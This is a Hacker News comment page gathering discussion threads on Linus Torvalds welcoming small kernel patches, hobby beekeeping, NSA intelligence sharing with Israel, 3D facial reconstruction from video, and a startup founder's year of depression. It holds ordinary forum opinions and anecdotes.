Great attitude. Linus has had plenty of heated moments on the mailing lists, but 1) he's often right and 2) his venom is usually reserved for experienced developers that really should know better. Glad to see him being so open and accepting with newbie kernel hackers.
3
shurcooL 8 hours ago 0 replies      
That makes a lot of sense. If I look at any project I've contributed to, it always started out with something small. Taking the time to make a small PR that makes a tiny improvement:

- shows you care about improving the project; you took the time to improve something small that others would ignore

- lets you test the waters. Are the project owners receptive of changes? Is it pleasant trying to contribute to the project? Or do they ignore your patch and don't reply for 2 weeks. You wouldn't want to spend a lot of effort just to find that out.

- gives you a chance to become familiar with the process, the tools, gain practice, and hopefully get rewarded with your change being accepted

For example, my first CL to Go was a trivial change:

https://codereview.appspot.com/97280043/patch/40001/50001

But without having done that (and having a good experience) I couldn't have been working on more complicated changes like https://codereview.appspot.com/142360043/ now.

4
munificent 8 hours ago 0 replies      
Small patches are the "hello world" of open source. They give you a chance to get familiar with and work through the contribution pipeline before you push something sizeable through.

There's little useful about "hello world" as a program, but it ensures you've got your toolchain working correctly, which is a necessary precondition for doing real work. Trivial patches are like that.

5
ljosa 10 hours ago 2 replies      
Ten years later, how is the Linux kernel community doing in terms of cultivating new contributors?
6
JacobEdelman 9 hours ago 3 replies      
Is it just me or is the main reason this is being upvoted so much is because Linus said something without a bad attitude? This isn't a rhetorical question, I honestly want to know.
7
post_break 9 hours ago 0 replies      
Reminds me of Lawrence of Arabia. "Big things have small beginnings" I've contributed tiny bug fixes and the feeling was great. I did that, me.
8
tehwalrus 6 hours ago 0 replies      
I completely agree. The only thing that's topped getting a tiny patch of my own accepted (into pylibtiff) was someone getting me to put a python module I'd written* onto pypi. Both were great feelings, and it's extremely important to encourage such highs in new people contributing to open projects (Linux kernel or random bibtex editor alike.)

* the library was in fact just a python wrapper for some C++ code, but that's where leverage for the original author starts, in bindings.

9
coherentpony 10 hours ago 0 replies      
That, ladies and gentlemen, is how you grow a community.
10
qwerta 8 hours ago 1 reply      
You need a good set of unit tests if you want to survive managing an open-source project.
11
vezzy-fnord 10 hours ago 1 reply      
Seems like it's good to remind people every now and then that Linus is a human with empathy, since a lot of them really don't understand the reasons for when he rants, and then start to draw conclusions.

On a related note, Theo de Raadt rants need far more attention than they currently get.

12
mwfogleman 10 hours ago 1 reply      
Woah, mentoring Linus had a good day!
13
GhotiFish 10 hours ago 1 reply      
That's a good attitude. If I find myself heading an open source project, I'll take that advice with me.
17
Loyalty Nearly Killed My Beehive
348 points by dnetesn  2 days ago   107 comments top 24
1
mudil 2 days ago 2 replies      
I started beekeeping 2 years ago, and I cannot be any happier about this hobby. It's easy and fun. Bees do not require feeding, cleaning, just an occasional check up. And they give my family the best honey the money can buy.

To start, I read (believe it or not) Beekeeping for Dummies (http://www.amazon.com/Beekeeping-For-Dummies-Howland-Blackis...). It's a well rated book, and it has all the basic info. Then I watched various YouTube videos.

Then I ordered the following list of supplies. (I buy all my equipment from Mann Lake. $100+ it's free shipping. http://mannlakeltd.com/)

This is a list I recommend:

Note that the hive boxes and frames are unassembled. Mann Lake does have assembled hives. Assembly is easy, and I did it with my kids.

1) WW-605_b Med Hive Qty. 5
2) FR-811 Med Frames Case of 10. Qty. 5 (so you get 50 frames)
3) CV-305 Suit - economy - Medium (Buy YOUR size.) Qty. 1
4) HD-540 Smoker Qty. 1
5) CL-620 Economy cowhide leather gloves (Buy YOUR size. This is small) Qty. 1
6) HD-210 7D Nails (1lb) Qty. 1
7) HD-220 Frame Nails Qty. 1
8) HD-620 Hive tool
9) HD-660 Bee Brush
10) WW-310 Bottom Board
11) Your choice of top cover (buy with Inner cover)... http://www.mannlakeltd.com/beekeeping-supplies/page29.html

I practice foundationless but some prefer not to deal with the cross comb headaches and use foundation. Foundation part number is (FN-720).

I adopted my hive from Jack at Los Altos Honey Bees (http://losaltoshoneybees.wordpress.com/). He goes and rescues feral colonies.

I also joined Beekeepers' Guild Of San Mateo County (http://www.sanmateobeeguild.org/). The club is great: the mailing list discussions keep me informed about things to do right now, and what to do to prepare for upcoming seasons.

2
radicaledward 2 days ago 3 replies      
DO NOT FEED YOUR INFANT HONEY

Just in case anyone read the first paragraph and thought, "Hey that's a good idea!" Honey contains bacteria that causes infant botulism [1]. Once a child has a more fully developed digestive system, this is no longer a problem.

[1] http://en.wikipedia.org/wiki/Botulism#Infant_botulism

3
SEJeff 2 days ago 4 replies      
Absolutely fascinating article. I'm really glad that HN contains the occasional non-tech related story. It seems somewhat obvious how an engineering mindset transfers very well to other disciplines, and unbeknownst to me, beekeeping is one of them.
4
flatline 2 days ago 2 replies      
> Queens typically live for about four or five years

This figure is from an old study that others have repeatedly failed to reproduce. More recent attempts to determine queen longevity have shown they live to an average of about a year, and furthermore failed to find any of significantly advanced age. So it shouldn't be too much of a surprise that she only lasted a season. Since there seem to be a few beekeepers hanging out here, I'd be curious to hear anecdotal evidence of queen lifespan.

5
Qworg 2 days ago 3 replies      
If you like this story, I'd unabashedly recommend that you try and keep bees. They are relatively low maintenance, interesting to observe and fun to debug (no pun intended). Success is amazing - both to eat and think about.

The other benefit is psychological - beekeeping requires an almost zen like approach when dealing with the hive. You cannot get angry or flustered, even when surrounded by thousands of bees desperately trying to sting you. You have to focus, be calm, and do the work.

6
MechSkep 2 days ago 2 replies      
One of my side projects is building a sensing electronics package to monitor the health and activity of beehives. The idea is to make it easier for someone just starting to maintain their hive.

Any one have feedback on the concept? Or features we haven't thought of?

7
k_sze 2 days ago 1 reply      
I'm a huge fan of ants, bees, and wasps, but I have never kept bees, only ants. There is something I don't understand.

Is there any rational advantage to keeping the beehive alive between the two queens, especially since the new queen is probably only remotely related in terms of genealogy? Is it just so the production of honey, propolis, etc remains uninterrupted? What happens if you let a beehive completely die and then put in a new queen? Would the beehive become too filthy for the new colony to develop easily?

Or does the author's wish to keep the beehive alive only stem from emotional attachment?

8
qwerta 2 days ago 1 reply      
I never heard of replacing queens, beehive always raised new one. But perhaps there are different methods in Europe.

I have a good story to share: we had 10 beehives at cabin in middle of woods and one of them got stolen! We moved remaining across the town to safer location. Carrying 100 pounds out of which 40 pounds are live bees is quite something :-)

9
csorrell 2 days ago 2 replies      
This is why I always recommend new beekeepers start out with at least two hives. If the author had another healthy hive, he could have moved a frame of young brood to his queenless hive and they would have raised a new queen on their own.
10
jackgavigan 2 days ago 1 reply      
There's a whole industry around renting beehives to farmers to pollinate crops: http://www.scientificamerican.com/article/migratory-beekeepi...

There's an interesting supply'n'demand thing going on as a result of the decline in the bee population, coupled with the growth of almonds as a cash crop: http://scientificbeekeeping.com/2012-almond-pollination-upda...

11
gresrun 2 days ago 0 replies      
My friends are currently serving as missionaries in Tanzania and are teaching the art of beekeeping to help diversify the local economy and diet: http://makondefrasers.wordpress.com/
12
hiharryhere 2 days ago 0 replies      
Great article, well written and fun. Though how is nobody weirded out by him just leaving his hive on the roof of an apartment he no longer lives in. What a hilarious dude.
13
S_A_P 2 days ago 1 reply      
So is there any truth to the "africanized/killer" (I don't know any other way to state it but I don't like the term) bees being more difficult to manage and more aggressive? I live in Texas where they arrived in the early 1990s. I would be leery of keeping bees that were not as docile as the european variety. I am not too worried about getting stung once or twice, but I have heard that the "killer" bees go ape shit once the stinging pheromones have been released and you can get stung hundreds of times in a short time span.
14
Nanzikambe 2 days ago 0 replies      
A beautiful article, makes me yearn for that recent-convert's enthusiasm for a new hobby. Reminds me of when I first took up mycoculture. Perhaps I'll get a beehive and join the legion of "that guy" :)
15
beginrescueend 2 days ago 0 replies      
Great article!

We're on our 3rd season beekeeping; we just collected honey, last night.

In fact, I got my first ever bee/wasp/hornet sting ever, last night, from one of our bees. I was being sloppy, wearing running shoes under my bee suit, instead of boots. It hardly hurt at all, though. (I've had worse mosquito bites; so far, horseflies are the worst bites/stings I've ever had).

We captured our first swarm, this year, and got another hive "for free." Woo hoo!

As far as ordering stuff, since somebody mentioned it, we just go to http://www.beekeepers.com/ to get our gear, since our local farm stores don't carry much.

I am interested in these projects, so I can get my bee geek on, but I don't know if I should commit the time and money to them (any success stories out there)? http://www.opensourcebeehives.net/ http://opensourceecology.org/wiki/Beekeeping http://openenergymonitor.org/emon/node/102

16
mathattack 1 day ago 0 replies      
"Undeterred, I installed the bees on the roof of my Brooklyn apartment and began the absurd process of learning how to keep them alive. Incredibly, they flourished, and by October I had perhaps 70,000 bees..."

That has to make one unpopular with the neighbors.

17
ncourage 2 days ago 1 reply      
I don't know why I didn't expect this, but this article was the most interesting thing I've read all day. It made me almost feel compassion for the bee hive by my mailbox (if you can call it that), in a hole in the grass. We've tried to be rid of them.
18
orenjacob 2 days ago 0 replies      
For those interested, Beekeeping For Dummies (http://www.amazon.com/dp/0470430656) is actually quite a good way to start. We've had our queen replaced by our swarm and it was quite an amazing thing to witness. Our hive/swarm gave more than 40 pounds of honey a year and we kept our whole street well fed with local honey for a few years. And my garden almost doubled in productivity once the bees were in place. A win all around. Sadly a family member developed an allergy so we have to discontinue keeping bees, but it was amazing while we had them and I strongly recommend keeping bees to anyone interested.
19
andyl 2 days ago 0 replies      
I have two hives in the yard. (Palo Alto) We produce 10-20 gallons of honey per year. Fun to harvest - kids love to get hands-on. Fun to give away esp to random strangers.
20
brianbreslin 2 days ago 2 replies      
My biggest fear of putting a beehive in my parents yard is that it would result in my dog getting stung or my parents.
21
Elzair 2 days ago 1 reply      
Is Colony Collapse Disorder largely affecting only domesticated beehives?
22
Thesaurus 2 days ago 0 replies      
I can't believe I read that whole thing, it was written so well. Quite informative and very interesting.
23
hywel 2 days ago 2 replies      
Kept waiting for this to turn out to be an allegory about a startup.
24
McDoku 2 days ago 2 replies      
This is so meta.
18
Israel's N.S.A. Scandal
336 points by not_that_noob  1 day ago   127 comments top 12
1
CamperBob2 1 day ago 3 replies      
Instead of being buried at the end of the article, Bamford's penultimate paragraph

   In Moscow, Mr. Snowden told me that the document
   reminded him of the F.B.I.'s overreach during the days
   of J. Edgar Hoover, when the bureau abused its powers to
   monitor and harass political activists. "It's much like
   how the F.B.I. tried to use Martin Luther King's
   infidelity to talk him into killing himself," he said.
   "We said those kinds of things were inappropriate back
   in the '60s. Why are we doing that now? Why are we
   getting involved in this again?"
... should be cut-and-pasted into any comment thread where a security-state apologist is trying to make people believe that Snowden is anything other than a patriot.

We can't fix this by working within the system. That's what the Church Committee tried to do. They failed. There is no reason to think their twenty-first century counterparts will not fail again.

2
jostmey 1 day ago 2 replies      
I think this is the most damning leak to date. There is no justification for freely giving information to Israel. And the part about people's porn habits being tracked is even scarier. That could be used to discredit virtually anyone (well, any male at least). Who hasn't visited an embarrassing porn website at least once in their life ? Now imagine your name being publicly associated with that website.
3
guelo 1 day ago 2 replies      
The way Israel owns American military and foreign policy should be a national shame. Reminds me of this other story about Israel going behind Obama's back to get weapons straight from the Pentagon. http://online.wsj.com/articles/u-s-sway-over-israel-on-gaza-...
4
rrggrr 1 day ago 0 replies      
This was not a one-sided trade. You can be sure the NSA received similar feeds from Israel on targets of great interest to US national interests. The inherent problem in these NSA debates is the inability of the NSA or policy makers to give the American people believable metrics that describe the value received for the effort. Could it be the US received important intel in return for its feeds? Yes. By not articulating a believable ROI on collection or sharing it looks increasingly like there wasn't one.
5
autism_hurts 1 day ago 2 replies      
Palantir has their hand in all of this.
6
BugBrother 1 day ago 0 replies      
A discussion of Unit 8200 I read today: http://strategypage.com/htmw/htintel/articles/20140923.aspx

(I read other sources because my Swedish media is like some inverse of Fox News. Stories like that Hamas had admitted murdering the three teens that started the last war is not... emphasized. The biggest morning newspaper didn't even mention that the accused murders of those teens died in a firefight today. Pallywood was never mentioned. Neither torture between Palestinian groups. Etc.)

7
javajosh 1 day ago 0 replies      
I think this all is going to take time to sink in, but in the end, Americans will do the right thing, which has been the overwhelming trend in the past. Think slavery. Think women's suffrage. Think civil rights. Think gay marriage.

This one is a little tough because the targets are unsympathetic and the anecdotes of specific harm are non-existent. It's difficult to argue against fighting dirty as a principle; it's much easier when you can point to a specific person (like MLK) and say, "That dude was clearly wronged."

I wish it was different. I wish people got more upset about government fighting dirty against anyone[1], even against the enemies that we ourselves agree are despicable and evil. Fighting dirty hurts us far more than it hurts them, because it damages our moral identity.

[1] The one exception is if there is an existential threat to the US. However, terrorism has never been, and will never be, an existential threat to the US[2] - except insofar as, in a fit of epic but unfunny irony, they manage to manipulate us into destroying our own moral fabric.

[2] The same argument applies to Israel. Israel playing dirty against state actors like Iran would be far more defensible, because Iran really could wipe Israel out.

8
not_that_noob 1 day ago 4 replies      
Why was the title changed? Here's the operative paragraph from the article below - there is a document that indicates the NSA is spying on porn visits of ordinary Americans to use against them in intimidation for exercising their rights to free speech. It doesn't get any worse than this.

"It should also trouble Americans that the N.S.A. could head down a similar path in this country. Indeed, there is some indication, from a top-secret 2012 document from Mr. Snowden's leaked files that I saw last year, that it already is. The document, from Gen. Keith B. Alexander, then the director of the N.S.A., notes that the agency had been compiling records of visits to pornographic websites and proposes using that information to damage the reputations of people whom the agency considers radicalizers - not necessarily terrorists, but those attempting, through the use of incendiary speech, to radicalize others. (The Huffington Post has published a redacted version of the document.)"

[Edit] For reference, the original title was: "NSA spying on porn visits of ordinary Americans" - which is exactly what they seem to be doing.

9
rasz_pl 1 day ago 1 reply      
> it would first be minimized, meaning that names and other personally identifiable information would be removed.

minimized?? I'm pretty sure he meant Anonymized

10
shna 1 day ago 0 replies      
Sounds like U.S. has not been a sovereign country for some time. Its intelligence service has been working for another country, passing sensitive information of its own citizens to Israel. Interesting. Even more interesting is that the bulk of the comments are on somewhere else whether this is a witch hunt or not, if it resembles to what Mr. Hoover did or did not do, if the committee in the past succeeded or not.
11
ronreiter 1 day ago 2 replies      
The US is a close ally of Israel for obvious reasons. Israel wants to better defend itself, so it co-operates with the N.S.A. This is what Israel needs to defend itself, and Israel probably does the same thing to help defend the US.

There will always be a conflict between privacy and security, you can stick to one on expense of the other, but you will never be able to "fix" things.

12
bengrunfeld 1 day ago 3 replies      
Israel's Arab civilians regularly attempt to blow themselves up in public places (believe me, I've stopped a few of them myself). Meanwhile the Palestinians gleefully lob rockets at populated cities in Israel. Of course Israel would want to monitor them as much as possible, and corroborate with the NSA to get as much data as possible. If that monitoring saved YOUR child from getting blown up on a bus, wouldn't you support it, or would you prefer your kid gets blown to smithereens so that social justice can be upheld? There's a big difference between America's domestic surveillance program and Israel's. Last time I checked, the central USA hadn't just recently been shelled.
19
Total Moving Face Reconstruction
306 points by mxfh  2 days ago   92 comments top 18
1
bsenftner 1 day ago 2 replies      
I run a startup specializing in this space called the 3D Avatar Store (www.3d-avatar-store.com).

3D Reconstruction of human faces is literally on the edge of mainstream. I'm betting on it, personally.

Our system is similar as theirs, but more general: we laser scanned 300,000 real people and then associated each laser scan with dozens of photos of that person taken from different angles, lighting conditions and expressions. That data set was then used for a neural net training - actually a pipeline of neural nets.

We can accept 1 photo and get back a good quality 3D model, or a series of photos and get better quality, or HD quality video and get back frame by frame, in expression reconstructions just like their solution. In fact, our system is able to recover 36 people per video feed in real time, as well as handle 4 video feeds at once. We don't need as much reference information as they do, because we trained our system to generally understand the human facial form, rather than their solution that operates in isolation for a single reconstruction operation.

Our current system is targeted as a WebAPI for games and serious simulations - enabling 3rd parties to implement "put yourself in the game" functionality. As such we have 3 different geometry outputs aimed at game/simulation developers. We also do facial recognition, and we have a special "forensic" output for that.

Our current "best output" is purposely "Pixar like" rather than realistic. Taking them realistic tends to freak people out - especially women (seems like our culture has trained women to have an idealized self image, and when presented with their non-mirror true form, they don't like it.)

You can learn more at these links:
https://3d-avatar-store.com/Web-API-Features-May-2014
https://3d-avatar-store.com/3D-Avatar-Creation-walkthru
https://3d-avatar-store.com/New-Face-Finder

2
phkahler 1 day ago 2 replies      
I like that they show cases where it has problems. It's very much "here's what we can do, and here's where it doesn't work." There is no hype, no claims of "novelty", no speculation on uses, just results. I wish this were far more common.
3
hunvreus 2 days ago 2 replies      
Can't help but think of "The Running Man" watching Schwarzenegger's face being rendered in 3D.

It's terrifying to think that in the next 5 to 10 years we won't be able to distinguish a forged, high definition video of pretty much anybody.

4
anigbrowl 2 days ago 4 replies      
Somewhat off-topic, but I wonder why facial recognition/modeling experts seem to persistently ignore ears and jawline. As someone who works in film and does some picture editing (though it's not my primary skillset), ears are just as individual as other parts of the face, and they're one of the trickiest things for makeup artists to work on. As CG in movies and videogames keeps improving, my suspension of disbelief is often broken by noticing problems with the ears, eg watching a CG anime film and noticing that everyone has the same ear shape.
5
sabalaba 2 days ago 1 reply      
3D reconstruction is used in state-of-the-art facial recognition as well.[1] Essentially you reconstruct the face in 3D, rotate the 3D model to the front, project it back into 2 dimensions, and then feed it through a CNN with deep architecture. Because this gives you very good alignment, you can do tricks like not having shared weights across the entire image. That is, each section of the input vector is known to correspond to a certain part of the face and thus can learn unique parameters that are well suited for that specific region.

The paper claims that it takes about 105 seconds to render a single frame. So one second of 30 fps video would take about 52 minutes to render. I would have to read more in depth to see what kind of savings can be had by sharing information across frames. (The paper also doesn't mention the use of GPU acceleration.)

[1] https://www.facebook.com/publications/546316888800776/

6
macca321 1 day ago 2 replies      
I think I'm missing the point. Why are all the reconstructed videos from the same angle? It would demonstrate it better if they repositioned the camera.
7
daniel_reetz 2 days ago 2 replies      
I'd like to ask the authors how they managed to do such great/natural looking reconstructions of the eyes. Eyes are tough because they're naturally specular, transparent in places, and refractive.
8
Harshit15 1 day ago 0 replies      
This can help a lot in recreating the faces of avatars, in animated movies and games. They have a tough time tracking facial details using small markers. I was wondering using shadow and shine removal to solve the issues shown in end. An example here is implemented by these autonomous car designers detailed as shadow correction: http://www.igvc.org/design/2013/US%20Naval%20Academy.pdf
9
imaginenore 2 days ago 4 replies      
This kind of advancements is one of the reasons I don't post photos of myself online. In a few years we will be capable of making videos with anybody's face replaced with anybody else's. It will be trivial to produce a fake video that can cause all kinds of legal troubles.

And yes, I realize it's even possible now, but with all the new algos and software coming out it will be easy enough for somebody to just mess with people's lives for fun.

10
aresant 2 days ago 0 replies      
Technology like this makes me wonder how long of a shelf-life video "evidence" has.

Or perhaps these same algos will also provide utility in detecting / decoding "fakes", sort of like edge-tracking / error level analysis etc today.

11
tantalor 1 day ago 0 replies      
Tragic they removed the verbal audio from the demo video. It would have been much easier to judge the visual accuracy if the reconstructed lip motion were combined with the original sound.
12
Aqwis 2 days ago 1 reply      
Very impressive. How large does the photo collection of the individual have to be to achieve results like those in the video?
13
igriffer 1 day ago 0 replies      
Hi! Anybody have some sources? I want to touch this method =) These 3D reconstructions are the best material for the face recognition!
14
31reasons 1 day ago 0 replies      
This + Virtual Gesture Tracking + VR = Virtual Meetings
15
SnowProblem 2 days ago 0 replies      
This will be huge for VR.
16
polskibus 1 day ago 0 replies      
The question that burns me is - when will we see this amazing algorithm implemented as part of OpenCV ?
17
debt 2 days ago 1 reply      
I've been increasingly interested in the Face. Human beings must have some incredible mental calculations going on when parsing a face. We're an evolved species that use the face as a form of communication.

I love the attached video in the link because it isolates perfectly the face. If you look closely you can see these tiny minute combinations within the face as each person talks; the eyes shifting, the face rotating, looking in various directions, the forehead crunching, the eyebrows raising, smiling, etc. All of these "cues" combine to create a message that we interpret instantly.

The face has inspired me lately to read more into this subject as it seems, at least on the surface, to be an extremely complex innate human ability; facial recognition.

18
Htsthbjig 1 day ago 0 replies      
Quite dangerous what this technology will mean in the future, they could manufacture evidence against you, publish it, and then let the masses lynch you.

I think this is what happened to the recent decapitation videos, they were reconstructed from home videos.

IMO the videos with the people dead in the floor are true, but the videos where they talk are staged.

Today we know there was a CIA team whose job was faking videos of Osama Bin Laden: http://blog.washingtonpost.com/spy-talk/2010/05/cia_group_ha...

Remember Osama Bin Laden appeared and disappeared according to US army interest at the time, finally ending in very strange circumstances (and being buried on the ocean, not letting anyone else internationally to confirm (by DNA) he was Osama).

For me it is staged because current technology could synthesize a voice only if there are not strong emotions. The same happens with the voice.

With strong emotions it becomes very easy for familiars and friends to notice as people do specific gestures and most of them are not recorded in video.

That people are perfectly calm before dying I could understand, but that they do while saying exactly what their captors want I can't.

Also, before the videos most of the population in UK did not want to go to war, after the videos (with a UK native), most of them support war, quo prodis?

20
A Long, Ugly Year of Depression That's Finally Fading
309 points by squiggy22  5 days ago   128 comments top 27
1
karmajunkie 5 days ago 0 replies      
Man, there are a lot of diagnoses getting thrown around this thread. As a caregiver to someone with a serious illness, as well as someone who periodically suffers from many of the same mental and emotional issues raised here... How about refraining from doing that unless you are A) a mental health or otherwise trained medical professional; and B) someone who has actually seen and assessed the patient. I'm not calling out anyone in particular because let's face it, this is HN and we're probably all know-it-alls at one time or another, but this can have some particularly pronounced thoughts and effects on the posters who are getting the comments.

If you are dealing with any of these issues, my heart goes out to you. Please reach out to a counselor, or at the very least a counselor or therapist who specializes in the things you're dealing with. If you need help finding one, my email is in my profile, i'm glad to help.

2
tst 5 days ago 4 replies      
I'm also recovering from a depression which lasted for quite a while. It absolutely sucks because you think you're worthless, nobody loves you, you can't get anything right and the best would be if you just wouldn't exist anymore.

And on top of that you isolate yourself. I know how hard it was to ask for help therefore I want to show you some things which helped me:

- Realize that your depression is lying to you. It doesn't tell the truth. It makes you believe that something is logical even if it isn't.

- Read 'Feeling Good' - terrible title, great book. It will probably work better than average on the average HN reader because it takes a 'rational' approach to depression (cognitive-behavioral therapy). It helps you to recognize destructive thought patterns and how to deal with them.

- Garbage in, garbage out. What works for computers also works for your body. Yeah, you're a geek but you can eat some vegs instead of the 500th pizza. Also working out (or other sports) are pretty great.

- Long term: Therapy which tries to work on the root cause and not just at symptoms.

Finally, here's a rather extensive list with lectures, books, exercises, etc. which help dealing with depression [1]. Back when I was fed up with feeling crap I created a spreadsheet with the 8 activities and tracked those every day.

Note: Every person seems to react differently. I read about people who improved a lot by meditating - on the other hand, it didn't work for me.

So, try some things out and don't give up. You can beat that liar in your head.

[0]: http://www.amazon.com/Feeling-Good-The-Mood-Therapy/dp/03808...

[1]: http://www.reddit.com/r/getting_over_it/comments/1nd14u/the_...

PS: If you have any questions feel free to ask - if you want to send me a private one write at <username> @ panictank.net

3
dchuk 5 days ago 3 replies      
I guess I'll be the only person to comment on the actual Moz business struggles rather than the depression side of this post. Moz raised their money at a really tricky time because it was right before Google essentially bent over the SEO industry. When Rand mentions the Content tool that hasn't even started being developed, that was something that was supposed to take your Google Analytics keyword referrer data and match it to your content and your rankings and your links and your competitors and basically help you spot keywords and content you can easily rank better for.

The timeline seems to be matching up where they had this plan for this tool before any of the Google SSL stuff started, so as they started working on the design and UX of it, Google started rolling out the SSL stuff and it basically ruined their idea. Moz ended up adding tools to try and guess what keywords made up your "(not provided)" data but that's a far cry from what they were originally planning.

I'm basing this entirely on being heavily involved in the SEO industry around the times mentioned in Rand's article and having even run a successful SEO SaaS product (which is still going even though I've moved on to other projects). I just remember seeing screenshots of what they wanted to build and thinking "wow, if they can nail this, it will be great". I wanted to build a similar app. But when Google started hiding all organic keyword data in analytics, I distinctly remember saying "Well there goes Moz's whole new product".

Google really fucked the SEO world up with their (not provided) move. Think what you will about SEO but it's still a legitimate marketing channel and I really have never been able to understand why Google thinks it's ok to not share your organic keyword data but your paid keyword data is totally fine to share with site owners.

But not much anyone can do about that now I suppose.

4
jtbigwoo 5 days ago 0 replies      
>> ...layoffs is a Pandora's Box-type word at a startup. Don't use it unless you're really being transparent (and not just fearful and overly panicked as I was).

I made a similar mistake once as a manager and experienced this kind of thing more than once as an employee. Certain words like "layoffs" or "merger" are so loaded because employees know that you know more than they do. Even if you think you're being totally transparent, employees are correct to assume that you're holding some things back because you are. It's your job to understand the state and direction of the company and give your employees the information they need to do their jobs. Employees, especially the smart ones, are going to try to infer additional information from what you tell them even when you think you've told them everything they need to know. Leaders need to be aware that a certain amount of "Kremlinology" happens in every company.

He made things worse by being vague about the company's real situation and contradicting himself a couple sentences later when he said, "...we'll survive (though not with much headroom..." If he's talking about layoffs, who is this "we"? Everybody? Rand and Sarah? If you're going to be transparent, you also need to be specific and direct. A better approach might have been, "Sarah and I modeled out some worst-case scenarios last week and this stretches our break-even point an extra six months, which will constrain our growth."

5
astockwell 5 days ago 0 replies      
Speaking purely to the experiences of building a new software product, I've seen this exact story play out countless times. Everyone (except maybe the engineers themselves) seems to think that designing a software product is part of the "planning phase", and thus should happen before any time is "wasted" on development:

> "That product planning led to an immense series of wireframes and comps (visual designs of what the product would look like and how it would function) that numbered into the hundreds of screens..."

The biggest contributor to this I've seen is the dozens (hundreds? thousands?) of small ways that a design (done in a vacuum, without simultaneous prototyping) will differ from established development patterns, frameworks, and other pre-packaged solutions that engineers use daily to avoid reinventing every wheel. And engineers respond with timelines that expect to be able to leverage those frameworks. Thus the dissonance begins.

One example: a design calls for a form to be broken across 4 pages. There may be great aesthetic rationale or even user testing to support this, but that means that in all likelihood any framework (e.g. Rails/Flask/Play/etc, not to mention native apps) will have to have additional modification to support sessions, changes to validation, changes to the auth domain, persistence changes, etc. And it's not necessary for an MVP. And many times these differences are much more subtle and deeply entrenched, and would require rethinking much of the wireframes/designs to align with development patterns. /rant

I'm not sure what the answer is here, except maybe that this is one more point in favor of having a "technical founder" or in general a technical person with decision-making authority, to avoid going down a road without proofing out your ideas or timelines.

6
Alex3917 5 days ago 0 replies      
> "the funny thing is, Marijuana doesn't have any pain-killing properties. It just lessens tension, anxiety, and stress for some people."

Marijuana is an analgesic. But in this case the effects are stemming from the fact that it's an anti-inflammatory, so that the fluid in your disc is no longer compressing the spinal nerves. And the fact that it reduces anxiety also reduces inflammation even further, since anxiety is probably largely what was causing the inflammation.

7
johnyzee 5 days ago 0 replies      
I love it when CEOs own up like this, it's probably one of the most appealing traits in a leader I personally can think of. As long as they don't become too insecure to actually lead, introspection and self-criticism are strengths, not weaknesses. Besides, being aware of these traits and their negative repercussions puts you in a pretty good place, the ones who really suffer are the guys who repress and deny the down slopes, always happy and bubbly on the outside but in reality inches from a mental breakdown.

The last part about how stress causes physical health problems is very important, and very overlooked. Besides the muscle and nervous tension the OP mentioned, stress seriously reduces immunity which can manifest itself in a myriad of unexpected ways (whichever subsystem fails first), from infections to cysts and all kinds of nastiness.

8
gadders 5 days ago 0 replies      
One last comment - this post from Rand reminds me of the following from Ben Horowitz:

"By far the most difficult skill for me to learn as CEO was the ability to manage my own psychology. Organizational design, process design, metrics, hiring and firing were all relatively straightforward skills to master compared to keeping my mind in check. Over the years, I've spoken to hundreds of CEOs all with the same experience. Nonetheless, very few people talk about it and I have never read anything on the topic. It's like the fight club of management: The first rule of the CEO psychological meltdown is don't talk about the psychological meltdown."

http://www.bhorowitz.com/what_s_the_most_difficult_ceo_skill...

9
mikeleeorg 5 days ago 0 replies      
This is an incredibly brave, and hopefully cathartic post by someone I greatly admire. I really hope he is able to find the support and peace he needs.

As a bit of an aside, I wonder how much of this has led to similar troubles for other founders:

When the Foundry investment closed, we redoubled our efforts to build Moz Analytics. We hired more aggressively (and briefly had a $12,000 referral bonus for engineers that ended up bringing in mostly wrong kinds of candidates along with creating some internal culture issues), and spent months planning the fine details of the product.

I've heard from friends & colleagues about the massive amount of pressure they've felt after closing an investment round. While fundraising is already an incredibly trying process, the next stage is sometimes even more difficult.

In contrast, other friends & colleagues who've opted for the bootstrapped route (either by choice or circumstance) haven't seemed to face a similar massive amount of pressure. Yes, they faced incredible stress too, but not to the level of those that have raised capital.

This is merely an anecdotal observation made in my peer group. I don't mean to imply that this is some kind of phenomenon. And clinical depression is something that can cut through any kind of circumstance.

I just can't help but notice the stark difference in stress level of founders who are growing organically & carefully vs founders who are in a mad recruiting rush and sometimes hire the wrong kind of people. I wonder how much of a relationship there is between having the right kind of people in your company vs the wrong kind of people, and the stress level of a founder. I would imagine a lot.

10
bocalogic 5 days ago 1 reply      
I respect Rand and give him a lot of credit for vocalizing his challenges. Depression is a challenge and it can be overcome.

I am not a doctor, but I can tell you that a lot of my peers are suffering from depression from business, marriage or just in general.

One thing I do know is that the world has changed a lot in the past decade. The price of everything just keeps going up and we are constantly bombarded by information. Humans are not built that way. There is no badge of honor for being under stress 24/7. It will catch up to you one way or the other.

Humans suffer from the fight or flight responses that we encounter during high stress situations. The challenge is to digest it and make decisions not based on fight or flight emotions.

The body produces cortisol when we are under duress and it is horrible for you. It screws up everything with your body and your mind. One way to counteract this is by working out, getting sunlight, eating the right foods and staying off caffeine. Try some black or green tea instead.

30 minutes of working out will combat cortisol production for about six hours. Even going for a walk helps a lot.

Most of the world's brightest minds and most successful people suffer from depression and knowing that you ARE NOT ALONE is a huge step forward.

You can beat depression and your life will turn around!

Talking about it and seeking help is definitely a step in the right direction. Keep your chins up.

11
raheemm 5 days ago 0 replies      
So few people and places can allow for this level of vulnerability and authenticity. This post is going to help a lot of people.

I have even more respect for Rand and Moz. We can say Fail Fast, Fail this, fail that ... but this kind of writing is the true embrace of failure, learning, wisdom, humanity.

12
gadders 5 days ago 4 replies      
I admire what Moz has done and it was an interesting read.

My comment is more of a meta one about HN. Are we really that interested in these stories of depression? We seem to get at least one a week. I realise it's an issue that may affect people here, but I'm not sure if we need the volume we are seeing now.

13
jroseattle 5 days ago 0 replies      
I read through this and the Can't Sleep/Loop post, which had me wiping my eyes. I feel I'm there, right now.

We're in the middle of raising money, while I also keep the engineering ship moving forward with product releases. We're about to run out of initial seed money, as we were supposed to have brought in the balance of the round and been on to Series A at this point. It's challenging, but I feel like I'm handling it.

Or so I thought. It turns out, I'm getting little sleep right now -- maybe 4-5 hours a night, on average. I've gained back so much weight and I abhor seeing myself in photos. I watch colleagues take absurd plans to investors and get way overfunded, more than they were ever asking to take on, while our little operation that's actually generating revenue (we will likely be break-even in 6 months) gets passed. I know it's not a rational reaction, but still the mental headwinds it creates really sap my soul.

It sucks when you're a (very) logical being, and something in your head no longer fits into place. I'm short with my kids at home, and I literally dread downtime. I find that cocktails go down easy, really easy.

It's a loop, alright.

14
